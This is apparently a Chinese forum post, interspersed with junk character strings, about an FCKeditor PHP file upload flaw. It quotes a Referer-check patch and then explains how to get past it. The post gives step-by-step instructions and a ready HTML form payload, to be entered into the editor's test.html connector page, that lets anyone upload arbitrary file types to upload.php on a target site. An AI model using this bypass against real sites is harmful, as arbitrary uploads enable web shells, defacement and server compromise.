漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
; _( k4 O4 L0 X9 M( W) U% A网上给出的修复方案是, g+ m0 O$ I. U8 O
修复方法,删除FCK编辑器用其他的编辑器; E, l6 z( ~! M v
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
* M' Q+ k7 A3 l在
+ C% e# |( A. grequire(‘config.php’);2 R0 q: \3 y$ @
require(‘util.php’);7 `* r7 v- G$ H; H( B
的下面添加以下代码—————————–
) h4 _& {- J) _0 B0 @$ V//防止外部提交
+ y+ y: K+ v8 ?- F( {3 s4 zfunction outsidepost()
8 O' t* ^1 r2 A{, M4 x7 h( G6 V# Q' R3 J
$servername=$_SERVER['SERVER_NAME'];% D! v, [ w; }4 g8 b" ]* x/ t7 B
$sub_from=@$_SERVER['HTTP_REFERER'];
4 M+ F! ]/ i, ~# g! \. \9 t$sub_len=strlen($servername);" R0 @, Q, s& G( K5 y* z
$checkfrom=substr($sub_from,7,$sub_len);
A7 y% Z6 w; F0 a& pif($checkfrom!=$servername){& _1 ] Y6 o: \; b
echo(“you don’t outsidepost!”);
9 b9 w1 D5 b$ |exit;, x: e9 Y& N, t
}) o$ B; X* { Y4 }! }0 n
}
" J) ]5 g( S$ G# q7 @& \* W9 f+ poutsidepost();' H) n2 T( c% Y) B
防止外部提交,但是没有防止内部提交,3 k; q) e/ c0 [3 N
利用方法:# G8 {- p8 l9 y2 t& A. L
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
- E" h2 c @3 A# Q3 c/ R2 h2,在Current Folder 框输入! L2 W: G i6 u5 G, x8 \' A
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>- D1 O- `. n8 r$ @4 L+ ?
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。- l6 n( Z; O" v: K6 o- \
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对